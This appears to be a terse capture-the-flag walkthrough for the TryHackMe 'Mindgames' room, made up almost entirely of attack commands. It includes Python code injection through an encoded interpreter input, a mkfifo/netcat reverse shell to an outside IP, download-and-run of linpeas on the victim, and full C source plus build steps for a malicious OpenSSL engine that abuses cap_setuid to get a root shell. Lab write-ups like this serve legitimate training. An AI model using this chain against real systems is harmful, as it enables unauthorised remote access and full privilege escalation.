Mindgames

Room Link: https://tryhackme.com/room/mindgames

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Nothing really found, the pages listed are all broken links

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

https://www.dcode.fr/brainfuck-language

Encode

__import__("os").system("ls -la")

Kali

nc -lvnp 4242

Encode

__import__("os").system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.231.107 4242 >/tmp/f")

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

LinPeas

Kali

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 81

Victim

cd /tmp/
wget http://$KALI:81/linpeas.sh
chmod +x linpeas.sh 
./linpeas.sh

Privilege Escalation

Exploit: https://chaudhary1337.github.io/p/how-to-openssl-cap_setuid-ep-privesc-exploit/

We found openssl has cap_setuid+ep in Linpeas

We can also run the below command to validate

Victim

getcap -r / 2>/dev/null

openssl-exploit-engine.c

#include <openssl/engine.h>

static int bind(ENGINE *e, const char *id)
{
  setuid(0); setgid(0);
  system("/bin/bash");
}

IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN() 

Kali

gcc -fPIC -o openssl-exploit-engine.o -c openssl-exploit-engine.c
gcc -shared -o openssl-exploit-engine.so -lcrypto openssl-exploit-engine.o
python2 -m SimpleHTTPServer 81

Victim

cd /tmp/
wget http://$KALI:81/openssl-exploit-engine.so
openssl req -engine ./openssl-exploit-engine.so